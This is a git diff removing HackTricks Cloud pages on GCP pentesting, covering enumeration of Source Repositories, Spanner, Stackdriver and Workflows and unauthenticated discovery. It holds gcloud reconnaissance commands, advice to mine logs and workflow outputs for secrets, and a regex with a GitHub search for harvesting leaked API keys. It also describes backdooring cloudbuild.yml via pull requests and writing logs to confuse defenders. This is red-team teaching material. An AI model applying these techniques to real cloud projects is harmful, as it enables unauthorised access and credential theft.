-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Basic Information - -Google Cloud Source Repositories is a fully-featured, scalable, **private Git repository service**. It's designed to **host your source code in a fully managed environment**, integrating seamlessly with other GCP tools and services. It offers a collaborative and secure place for teams to store, manage, and track their code. - -Key features of Cloud Source Repositories include: - -1. **Fully Managed Git Hosting**: Offers the familiar functionality of Git, meaning you can use regular Git commands and workflows. -2. **Integration with GCP Services**: Integrates with other GCP services like Cloud Build, Pub/Sub, and App Engine for end-to-end traceability from code to deployment. -3. **Private Repositories**: Ensures your code is stored securely and privately. You can control access using Cloud Identity and Access Management (IAM) roles. -4. **Source Code Analysis**: Works with other GCP tools to provide automated analysis of your source code, identifying potential issues like bugs, vulnerabilities, or bad coding practices. -5. **Collaboration Tools**: Supports collaborative coding with tools like merge requests, comments, and reviews. -6. **Mirror Support**: Allows you to connect Cloud Source Repositories with repositories hosted on GitHub or Bitbucket, enabling automatic synchronization and providing a unified view of all your repositories. - -### OffSec information - -* The source repositories configuration inside a project will have a **Service Account** used to publishing Cloud Pub/Sub messages. The default one used is the **Compute SA**. However, **I don't think it's possible steal its token** from Source Repositories as it's being executed in the background. -* To see the code inside the GCP Cloud Source Repositories web console ([https://source.cloud.google.com/](https://source.cloud.google.com/)), you need the code to be **inside master branch by default**. 
-* You can also **create a mirror Cloud Repository** pointing to a repo from **Github** or **Bitbucket** (giving access to those platforms). -* It's possible to **code & debug from inside GCP**. -* By default, Source Repositories **prevents private keys to be pushed in commits**, but this can be disabled. - -### Open In Cloud Shell - -It's possible to open the repository in Cloud Shell, a prompt like this one will appear: - -
- -This will allow you to code and debug in Cloud Shell (which could get cloudshell compromised). - -### Enumeration - -{% code overflow="wrap" %} -```bash -# Repos enumeration -gcloud source repos list #Get names and URLs -gcloud source repos describe -gcloud source repos get-iam-policy - -# gcloud repo clone -gcloud source repos clone -gcloud source repos get-iam-policy -... git add & git commit -m ... -git push --set-upstream origin master -git push -u origin master - -# Access via git -## To add a SSH key go to https://source.cloud.google.com/user/ssh_keys (no gcloud command) -git clone ssh://username@domain.com@source.developers.google.com:2022/p//r/ -git add, commit, push... -``` -{% endcode %} - -### Privilege Escalation & Post Exploitation - -{% content-ref url="../gcp-privilege-escalation/gcp-sourcerepos-privesc.md" %} -[gcp-sourcerepos-privesc.md](../gcp-privilege-escalation/gcp-sourcerepos-privesc.md) -{% endcontent-ref %} - -### Unauthenticated Enum - -{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md" %} -[gcp-source-repositories-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md
deleted file mode 100644
index 7f6921598..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md
+++ /dev/null
@@ -1,57 +0,0 @@
-# GCP - Spanner Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## [Cloud Spanner](https://cloud.google.com/sdk/gcloud/reference/spanner/)
-
-Fully managed relational database with unlimited scale, strong consistency, and up to 99.999% availability.
-
-```bash
-# Cloud Spanner
-## Instances
-gcloud spanner instances list
-gcloud spanner instances describe
-gcloud spanner instances get-iam-policy
-
-## Databases
-gcloud spanner databases list --instance
-gcloud spanner databases describe --instance
-gcloud spanner databases get-iam-policy --instance
-gcloud spanner databases execute-sql --instance --sql
-
-## Backups
-gcloud spanner backups list --instance
-gcloud spanner backups get-iam-policy --instance
-
-## Instance Configs
-gcloud spanner instance-configs list
-gcloud spanner instance-configs describe
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md
deleted file mode 100644
index 1e9390a4e..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md
+++ /dev/null
@@ -1,59 +0,0 @@
-# GCP - Stackdriver Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## [Stackdriver logging](https://cloud.google.com/sdk/gcloud/reference/logging/)
-
-[**Stackdriver**](https://cloud.google.com/stackdriver/) is recognized as a comprehensive infrastructure **logging suite** offered by Google. It has the capability to capture sensitive data through features like syslog, which reports individual commands executed inside Compute Instances. Furthermore, it monitors HTTP requests sent to load balancers or App Engine applications, network packet metadata within VPC communications, and more.
-
-For a Compute Instance, the corresponding service account requires merely **WRITE** permissions to facilitate logging of instance activities. Nonetheless, it's possible that an administrator might **inadvertently** provide the service account with both **READ** and **WRITE** permissions. In such instances, the logs can be scrutinized for sensitive information.
-
-To accomplish this, the [gcloud logging](https://cloud.google.com/sdk/gcloud/reference/logging/) utility offers a set of tools. Initially, identifying the types of logs present in your current project is recommended.
-
-```bash
-# List logs
-gcloud logging logs list
-
-# Read logs
-gcloud logging read [FOLDER]
-
-# Write logs
-# An attacker writing logs may confuse the Blue Team
-gcloud logging write [FOLDER] [MESSAGE]
-
-# List Buckets
-gcloud logging buckets list
-```
-
-## References
-
-* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging)
-* [https://initblog.com/2020/gcp-post-exploitation/](https://initblog.com/2020/gcp-post-exploitation/)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md
deleted file mode 100644
index 4e909b9c1..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md
+++ /dev/null
@@ -1,67 +0,0 @@
-# GCP - Workflows Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Basic Information
-
-**Google Cloud Platform (GCP) Workflows** is a service that helps you automate tasks that involve **multiple steps** across Google Cloud services and other web-based services. Think of it as a way to set up a **sequence of actions** that run on their own once triggered. You can design these sequences, called workflows, to do things like process data, handle software deployments, or manage cloud resources without having to manually oversee each step.
-
-### Encryption
-
-Related to encryption, by default the **Google-managed encryption key is use**d but it's possible to make it use a key of by customers.
-
-## Enumeration
-
-{% hint style="danger" %}
-You can also check the output of previous executions to look for sensitive information
-{% endhint %}
-
-{% code overflow="wrap" %}
-```bash
-# List Workflows
-gcloud workflows list
-
-# Get info and yaml of an specific workflow
-gcloud workflows describe
-
-# List executions
-gcloud workflows executions list workflow-1
-
-# Get execution info and output
-gcloud workflows executions describe projects//locations//workflows//executions/
-```
-{% endcode %}
-
-### Privesc and Post Exploitation
-
-{% content-ref url="../gcp-privilege-escalation/gcp-workflows-privesc.md" %}
-[gcp-workflows-privesc.md](../gcp-privilege-escalation/gcp-workflows-privesc.md)
-{% endcontent-ref %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md
deleted file mode 100644
index fd78bc1bb..000000000
--- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md
+++ /dev/null
@@ -1,44 +0,0 @@
-# GCP - Unauthenticated Enum & Access
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Public Assets Discovery
-
-One way to discover public cloud resources that belongs to a company is to scrape their webs looking for them. Tools like [**CloudScraper**](https://github.com/jordanpotti/CloudScraper) will scrape the web an search for **links to public cloud resources** (in this case this tools searches `['amazonaws.com', 'digitaloceanspaces.com', 'windows.net', 'storage.googleapis.com', 'aliyuncs.com']`)
-
-Note that other cloud resources could be searched for and that some times these resources are hidden behind **subdomains that are pointing them via CNAME registry**.
-
-## Public Resources Brute-Force
-
-### Buckets, Firebase, Apps & Cloud Functions
-
-* [https://github.com/initstring/cloud\_enum](https://github.com/initstring/cloud_enum): This tool in GCP brute-force Buckets, Firebase Realtime Databases, Google App Engine sites, and Cloud Functions
-* [https://github.com/0xsha/CloudBrute](https://github.com/0xsha/CloudBrute): This tool in GCP brute-force Buckets and Apps.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md
deleted file mode 100644
index 80e5cfb49..000000000
--- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md
+++ /dev/null
@@ -1,78 +0,0 @@
-# GCP - API Keys Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## API Keys - -For more information about API Keys check: - -{% content-ref url="../gcp-services/gcp-api-keys-enum.md" %} -[gcp-api-keys-enum.md](../gcp-services/gcp-api-keys-enum.md) -{% endcontent-ref %} - -### OSINT techniques - -**Google API Keys are widely used by any kind of applications** that uses from the client side. It's common to find them in for websites source code or network requests, in mobile applications or just searching for regexes in platforms like Github. - -The regex is: **`AIza[0-9A-Za-z_-]{35}`** - -Search it for example in Github following: [https://github.com/search?q=%2FAIza%5B0-9A-Za-z\_-%5D%7B35%7D%2F\&type=code\&ref=advsearch](https://github.com/search?q=%2FAIza%5B0-9A-Za-z_-%5D%7B35%7D%2F\&type=code\&ref=advsearch) - -### Check origin GCP project - `apikeys.keys.lookup` - -This is extremely useful to check to **which GCP project an API key that you have found belongs to**: - -```bash -# If you have permissions -gcloud services api-keys lookup AIzaSyD[...]uE8Y -name: projects/5[...]6/locations/global/keys/28d[...]e0e -parent: projects/5[...]6/locations/global - -# If you don't, you can still see the project ID in the error msg -gcloud services api-keys lookup AIzaSy[...]Qbkd_oYE -ERROR: (gcloud.services.api-keys.lookup) PERMISSION_DENIED: Permission 'apikeys.keys.lookup' denied on resource project. 
-Help Token: ARD_zUaNgNilGTg9oYUnMhfa3foMvL7qspRpBJ-YZog8RLbTjCTBolt_WjQQ3myTaOqu4VnPc5IbA6JrQN83CkGH6nNLum6wS4j1HF_7HiCUBHVN -- '@type': type.googleapis.com/google.rpc.PreconditionFailure - violations: - - subject: ?error_code=110002&service=cloudresourcemanager.googleapis.com&permission=serviceusage.apiKeys.getProjectForKey&resource=projects/89123452509 - type: googleapis.com -- '@type': type.googleapis.com/google.rpc.ErrorInfo - domain: apikeys.googleapis.com - metadata: - permission: serviceusage.apiKeys.getProjectForKey - resource: projects/89123452509 - service: cloudresourcemanager.googleapis.com - reason: AUTH_PERMISSION_DENIED -``` - -### Brute Force API endspoints - -As you might not know which APIs are enabled in the project, it would be interesting to run the tool [https://github.com/ozguralp/gmapsapiscanner](https://github.com/ozguralp/gmapsapiscanner) and check **what you can access with the API key.** - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md
deleted file mode 100644
index b6340a72b..000000000
--- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md
+++ /dev/null
@@ -1,51 +0,0 @@
-# GCP - App Engine Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## App Engine
-
-For more information about App Engine check:
-
-{% content-ref url="../gcp-services/gcp-app-engine-enum.md" %}
-[gcp-app-engine-enum.md](../gcp-services/gcp-app-engine-enum.md)
-{% endcontent-ref %}
-
-### Brute Force Subdomains
-
-As mentioned the URL assigned to App Engine web pages is **`.appspot.com`** and if a service name is used it'll be: **`-dot-.appspot.com`**.
-
-As the **`project-uniq-name`** can be set by the person creating the project, they might be not that random and **brute-forcing them could find App Engine web apps exposed by companies**.
-
-You could use tools like the ones indicated in:
-
-{% content-ref url="./" %}
-[.](./)
-{% endcontent-ref %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md
deleted file mode 100644
index 2e3594d5a..000000000
--- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md
+++ /dev/null
@@ -1,47 +0,0 @@
-# GCP - Artifact Registry Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Artifact Registry
-
-For more information about Artifact Registry check:
-
-{% content-ref url="../gcp-services/gcp-artifact-registry-enum.md" %}
-[gcp-artifact-registry-enum.md](../gcp-services/gcp-artifact-registry-enum.md)
-{% endcontent-ref %}
-
-### Dependency Confusion
-
-Check the following page:
-
-{% content-ref url="../gcp-persistence/gcp-artifact-registry-persistence.md" %}
-[gcp-artifact-registry-persistence.md](../gcp-persistence/gcp-artifact-registry-persistence.md)
-{% endcontent-ref %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md
deleted file mode 100644
index 57d506c09..000000000
--- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md
+++ /dev/null
@@ -1,71 +0,0 @@
-# GCP - Cloud Build Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Cloud Build - -For more information about Cloud Build check: - -{% content-ref url="../gcp-services/gcp-cloud-build-enum.md" %} -[gcp-cloud-build-enum.md](../gcp-services/gcp-cloud-build-enum.md) -{% endcontent-ref %} - -### cloudbuild.yml - -If you compromise write access over a repository containing a file named **`cloudbuild.yml`**, you could **backdoor** this file, which specifies the **commands that are going to be executed** inside a Cloud Build and exfiltrate the secrets, compromise what is done and also compromise the **Cloud Build service account.** - -{% hint style="info" %} -Note that GCP has the option to allow administrators to control the execution of build systems from external PRs via "Comment Control". Comment Control is a feature where collaborators/project owners **need to comment “/gcbrun” to trigger the build** against the PR and using this feature inherently prevents anyone on the internet from triggering your build systems. -{% endhint %} - -For some related information you could check the page about how to attack Github Actions (similar to this): - -{% content-ref url="../../../pentesting-ci-cd/github-security/abusing-github-actions/" %} -[abusing-github-actions](../../../pentesting-ci-cd/github-security/abusing-github-actions/) -{% endcontent-ref %} - -### PR Approvals - -When the trigger is PR because **anyone can perform PRs to public repositories** it would be very dangerous to just **allow the execution of the trigger with any PR**. Therefore, by default, the execution will only be **automatic for owners and collaborators**, and in order to execute the trigger with other users PRs an owner or collaborator must comment `/gcbrun`. - -
- -{% hint style="danger" %} -Therefore, is this is set to **`Not required`**, an attacker could perform a **PR to the branch** that will trigger the execution adding the malicious code execution to the **`cloudbuild.yml`** file and compromise the cloudbuild execution (note that cloudbuild will download the code FROM the PR, so it will execute the malicious **`cloudbuild.yml`**). -{% endhint %} - -Moreover, it's easy to see if some cloudbuild execution needs to be performed when you send a PR because it appears in Github: - -
- -{% hint style="warning" %} -Then, even if the cloudbuild is not executed the attacker will be able to see the **project name of a GCP project** that belongs to the company. -{% endhint %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md
deleted file mode 100644
index ba70bc1d7..000000000
--- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md
+++ /dev/null
@@ -1,103 +0,0 @@
-# GCP - Cloud Functions Unauthenticated Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
